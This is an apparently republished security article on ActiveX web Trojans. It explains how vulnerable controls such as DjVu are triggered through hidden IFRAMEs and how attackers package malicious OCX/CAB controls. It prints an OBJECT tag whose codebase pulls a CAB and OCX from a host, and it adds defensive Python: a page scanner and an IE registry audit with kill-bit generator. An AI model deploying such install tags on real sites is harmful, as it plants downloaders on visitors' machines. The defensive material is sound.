Analysis of ActiveX Trojans: intrusion in the name of Installation

Source: Internet
Author: User

ActiveX was once one of the main technical tricks of rogue software (the adware and spyware bundles of that era). Most of that rogue software has since faded away, but ActiveX has not left the scene: web pages that plant a Trojan through it, the so-called ActiveX Trojans, have become one of the most popular ways of mounting a web-page Trojan (a drive-by download).

Zhang Guiling, North Shore team: senior security engineer, working in the security industry for more than 10 years.

ActiveX was developed by Microsoft, whose engineers seem to have thought too well of the world and never expected anyone to use ActiveX to do harm. When rogue software was at its height, a website calling itself the "XX Baby Video Chat Room" used pornographic lures to entice users into installing its ActiveX video-chat control.

Besides tracking the user's network activity, the control popped up advertisements, uploaded the user's Word documents and engaged in other rogue behaviour. As more and more rogue software abused ActiveX, Microsoft finally added ActiveX verification measures in IE7. In IE7 a control that has not already been approved is blocked, and the user has to allow it explicitly from the Information Bar, instead of an installation dialog opening straight away as before.

Encyclopedia: ActiveX is Microsoft's name for a family of object-oriented component technologies and tools. An ActiveX control must be installed on the machine before a web page can use it.

  Where did ActiveX Trojans come from?

In the years when rogue software ran wild, rogue programs fought each other like rival gangs for the choice positions on users' computers, and many techniques originally developed for viruses were applied to them. Later the traffic ran the other way: viruses began to learn from rogue software and adopted some of its techniques. The ActiveX Trojan is probably the technique that viruses learned most thoroughly from rogue software.

Encyclopedia: Few browsers support ActiveX as eagerly as IE. Although Firefox, Netscape and others can support ActiveX to varying degrees through plug-ins, the most serious ActiveX problems are found in IE.

The main reason Trojans can exploit ActiveX is its verification mechanism. In the early days, if a website had content that required an ActiveX control, the browser would prompt again and again to install it every time you visited, and many users, for one reason or another, simply clicked "OK" and allowed the control to be installed.

This is like walking down the road while a crowd of strangers comes up one by one saying they want to be your friend. You nod to accept or shake your head to refuse, and anyone you nod to becomes your friend and can walk freely into your home. The frightening part is that some of them are already your friends before you discover they are thieves or hooligans.

ActiveX Trojans currently take two main forms. One exploits vulnerabilities (typically buffer overflows) in the ActiveX controls of legitimate programs to load a Trojan; the other is a purpose-written malicious control: a Trojan disguised as an ActiveX control that appears to offer some useful function, so that users are tricked into installing it. The cases below demonstrate how attackers use ActiveX to plant Trojans.

  ActiveX Trojan Attack and Defense Walkthrough

  Method 1: Trojan Infection through Vulnerabilities

  Attack
The most common way attackers use ActiveX for a web-page Trojan is to target a vulnerable ActiveX control that is already installed on the user's system. The malicious page triggers the flaw in that existing control, and the Trojan is planted on the user's computer without the user noticing anything.

Well-known examples of attacks through vulnerable ActiveX controls include the Flash Player and RealPlayer controls. These vulnerabilities have caused great harm; in particular, attackers are still using the RealPlayer ActiveX vulnerability to plant Trojans.

The following uses the DjVu ActiveX control vulnerability as an example of how a Trojan is planted. First, the attacker pastes the exploit code into WordPad and saves it as an HTML file with any name; then an IFRAME is used to embed that HTML file in a normal web page. When a machine with the vulnerable DjVu control opens the page, the proof-of-concept shellcode simply launches the local calculator. Real attackers are not so kind: they replace the shellcode with code that downloads and runs a malicious program of their choice, and the user who opened the page is left with a compromised machine and looking for help.

Encyclopedia: The DjVu ActiveX control is a browser plug-in for viewing DjVu, a compressed image and document format. It has a buffer overflow when it processes an overly long value for its ImageURL property.

  Defense
The simplest defence against Trojans that exploit ActiveX vulnerabilities is to browse with something other than IE, such as Firefox. Note that Maxthon and 360 Secure Browser were, in the versions current when this was written, built on IE's Trident engine, so they can still load ActiveX controls unless you disable them in their settings. More reliable is to keep the affected software patched (or uninstall the vulnerable control), or to set the control's kill bit so that IE refuses to load it at all. It is also worth running anti-Trojan software.

  Method 2: Writing an ActiveX Trojan

  Attack
ActiveX Trojans of this kind spread by exploiting users' habit of blindly clicking "Install" in the ActiveX prompt on a web page. Many users cannot tell a harmless ActiveX control from a harmful one.

These ActiveX Trojans are dressed up as video chat tools, galleries of beautiful pictures and similar lures, and users who cannot resist the temptation install the Trojan from the web page.

Writing an ActiveX Trojan requires some programming background, and the whole process is fairly involved. For reasons of space, I will only sketch the build process here for readers who want to become security engineers.

First, the attacker writes an OCX control with a downloader or some other malicious function; this is the core and soul of the ActiveX Trojan. Next, the attacker writes an INF file describing the setup (the security settings for installation), and uses a CAB compression tool such as WinCAB to pack the two files into a CAB file.

Finally, the attacker uploads the CAB file to his website, adds to a web page the code that calls for installation of the ActiveX control, and waits for users to browse the page.

The call code is as follows:

  <!-- classid names the control; codebase tells IE where to fetch the CAB that installs it -->
  <OBJECT classid="clsid:68ADAF59-76C1-4561-A45A-867F43545237"
          codebase="http://192.168.1.1/web/setup.cab#version=,">
    <!-- the value handed to the control as its "Setup" property -->
    <PARAM name="Setup" value="http://192.168.1.1/web/download.ocx">
  </OBJECT>

Because such an ActiveX Trojan carries no valid signature, a browser with default settings will generally refuse to install it, but there are still ways to get around these security restrictions.
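As an added example (not code from the article), here is a small static scanner in Python that looks for the two embedding patterns described in Method 1 and Method 2: a hidden IFRAME pulling in a trigger page whose OBJECT carries an overlong property value, and an OBJECT tag whose codebase points at a CAB file to be installed. The pages it runs on are constructed for this example: the first reuses the OBJECT tag shown above, the second uses a placeholder all-zero CLSID rather than the real DjVu control's, and the 1024-byte threshold for "overlong" is an assumption, not a figure from the article.

```python
from html.parser import HTMLParser

# Added example (not from the original article): a static scanner for the two
# embedding patterns the article describes. The threshold is an assumption
# chosen for this example; legitimate URLs are rarely anywhere near it.
MAX_PARAM_LEN = 1024


class ActiveXScanner(HTMLParser):
    """Collect (kind, subject, detail) findings while walking the HTML."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._object_clsid = None   # classid of the OBJECT currently open

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}   # names are lowercased
        if tag == "object":
            clsid = a.get("classid", "")
            codebase = a.get("codebase", "")
            self._object_clsid = clsid
            # Method 2: a codebase ending in .cab asks IE to download and install the control
            if codebase.split("#", 1)[0].lower().endswith(".cab"):
                self.findings.append(("cab-codebase", clsid, codebase))
            elif clsid:
                self.findings.append(("object-classid", clsid, codebase))
        elif tag == "param" and self._object_clsid is not None:
            # Method 1: an absurdly long property value is the overflow trigger
            value = a.get("value", "")
            if len(value) > MAX_PARAM_LEN:
                detail = "%s=%d bytes" % (a.get("name", ""), len(value))
                self.findings.append(("overlong-param", self._object_clsid, detail))
        elif tag == "iframe":
            # Method 1: the trigger page is pulled in through a hidden or tiny IFRAME
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width", "") in ("0", "1") or a.get("height", "") in ("0", "1")
            if "display:none" in style or "visibility:hidden" in style or tiny:
                self.findings.append(("hidden-iframe", a.get("src", ""), style))

    def handle_endtag(self, tag):
        if tag == "object":
            self._object_clsid = None


def scan_html(html):
    """Return the list of findings for one HTML document."""
    scanner = ActiveXScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed samples. The first mirrors the article's OBJECT tag; the second
# stands in for the IFRAME'd trigger page, with a placeholder all-zero CLSID
# (not the real DjVu control's) and a 4000-byte ImageURL value.
LANDING_PAGE = """<html><body><h1>Video chat</h1>
<OBJECT classid="clsid:68ADAF59-76C1-4561-A45A-867F43545237"
        CodeBase="http://192.168.1.1/web/setup.cab#version=1,0,0,0">
<PARAM name="Setup" VALUE="http://192.168.1.1/web/download.ocx">
</OBJECT>
<iframe src="exp.html" width="0" height="0" style="display: none"></iframe>
</body></html>"""

TRIGGER_PAGE = ('<object classid="clsid:00000000-0000-0000-0000-000000000000">'
                '<param name="ImageURL" value="' + "A" * 4000 + '"></object>')

if __name__ == "__main__":
    for name, page in (("landing", LANDING_PAGE), ("trigger", TRIGGER_PAGE)):
        for kind, subject, detail in scan_html(page):
            print("%s: %-14s %s %s" % (name, kind, subject, detail))
```

The scanner is deliberately a first-pass triage tool: a finding of `cab-codebase` only means a page wants to install a control, which a legitimate site may also do, so the CLSID and CAB should then be checked against what the site is expected to ship.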

  Defense
To avoid this kind of ActiveX Trojan attack you only need to stop the control from being invoked and run.

The best defence against this method is configured on the client. Open IE, click "Tools > Internet Options > Security > Custom Level", set the security level to "High", set the second and third items under "ActiveX controls and plug-ins" to "Disable" and the other items to "Prompt", then click "OK". With these settings IE will effectively block ActiveX Trojan attacks while browsing web pages. The settings that actually stop an unsolicited install are the two that govern downloading signed and unsigned ActiveX controls: with both disabled, IE never fetches the CAB file named in the OBJECT tag's codebase at all.
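The dialog settings above are stored in the registry, so they can be audited and enforced without clicking through the dialog. The following is an added example in Python, not part of the original article: it parses a `reg export` of the Internet zone key, reports which ActiveX actions are not set to Disable, and generates a .reg file that sets a control's kill bit, which makes IE refuse to load that control regardless of zone settings (useful against a vulnerable control like the DjVu one in Method 1 while waiting for a patch). The value names (1001, 1004, 1200, 1201), the data codes (0/1/3) and the kill-bit flag 0x400 are Microsoft's documented ones; the registry export is constructed for the example, and the CLSID used is the one from the page's sample OBJECT tag, purely for illustration.

```python
# Added example (not from the original article): audit IE's Internet-zone ActiveX
# settings from a registry export and emit a kill-bit .reg file.

# Value names under HKCU\...\Internet Settings\Zones\3 (the Internet zone), with
# Microsoft's documented meanings. Data: 0 = Enable, 1 = Prompt, 3 = Disable.
ACTIVEX_ACTIONS = {
    "1001": "Download signed ActiveX controls",
    "1004": "Download unsigned ActiveX controls",
    "1200": "Run ActiveX controls and plug-ins",
    "1201": "Initialize and script ActiveX controls not marked as safe",
}
ENABLE, PROMPT, DISABLE = 0, 1, 3
INTERNET_ZONE = (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
                 r"\Internet Settings\Zones\3")
KILLBIT_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"


def parse_reg(text):
    """Parse the text of a `reg export` file into {key: {value_name: data}}.
    dword values become ints, quoted strings become str, anything else stays raw."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"') and "=" in line:
            name, _, data = line.partition("=")
            name = name.strip('"')
            if data.startswith("dword:"):
                keys[current][name] = int(data[len("dword:"):], 16)
            elif len(data) >= 2 and data[0] == data[-1] == '"':
                keys[current][name] = data[1:-1]
            else:
                keys[current][name] = data
    return keys


def audit_internet_zone(reg):
    """Return (value_name, label, state) for every ActiveX action not set to Disable.
    A missing value means the zone's built-in default applies; it is reported as 'not set'."""
    zone = reg.get(INTERNET_ZONE, {})
    weak = []
    for value_name, label in ACTIVEX_ACTIONS.items():
        setting = zone.get(value_name)
        if setting != DISABLE:
            state = {ENABLE: "enabled", PROMPT: "prompt"}.get(setting, "not set")
            weak.append((value_name, label, state))
    return weak


def killbit_reg(clsids):
    """Build a .reg file that sets Compatibility Flags = 0x400 (the kill bit) for each
    CLSID, so IE refuses to instantiate the control even though it stays installed."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in clsids:
        guid = clsid.strip().strip("{}").upper()
        lines.append("[%s\\{%s}]" % (KILLBIT_ROOT, guid))
        lines.append('"Compatibility Flags"=dword:00000400')
        lines.append("")
    return "\n".join(lines)


# Constructed registry export: signed downloads on Prompt, unsigned on Disable,
# running controls Enabled, and 1201 absent (so the zone default applies).
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"DisplayName"="Internet"
"1001"=dword:00000001
"1004"=dword:00000003
"1200"=dword:00000000
"""

if __name__ == "__main__":
    for value_name, label, state in audit_internet_zone(parse_reg(SAMPLE_EXPORT)):
        print("weak: %s (%s) is %s" % (value_name, label, state))
    # CLSID taken from the article's sample OBJECT tag, purely for illustration
    print(killbit_reg(["68ADAF59-76C1-4561-A45A-867F43545237"]))
```

On a real machine, `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3" zone3.reg` produces the input (reg.exe writes it as UTF-16, so decode it before passing the text to `parse_reg`); if the Security_HKLM_only policy is in force, export the same path under HKLM instead. The generated kill-bit file is applied with `reg import`, which needs administrator rights because it writes under HKLM.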

The content of this page comes from the Internet and does not represent Alibaba Cloud's opinion; the products and services mentioned on this page have no relationship with Alibaba Cloud. If you find the content of this page confusing, please write to us by email and we will handle the problem within 5 days of receiving it.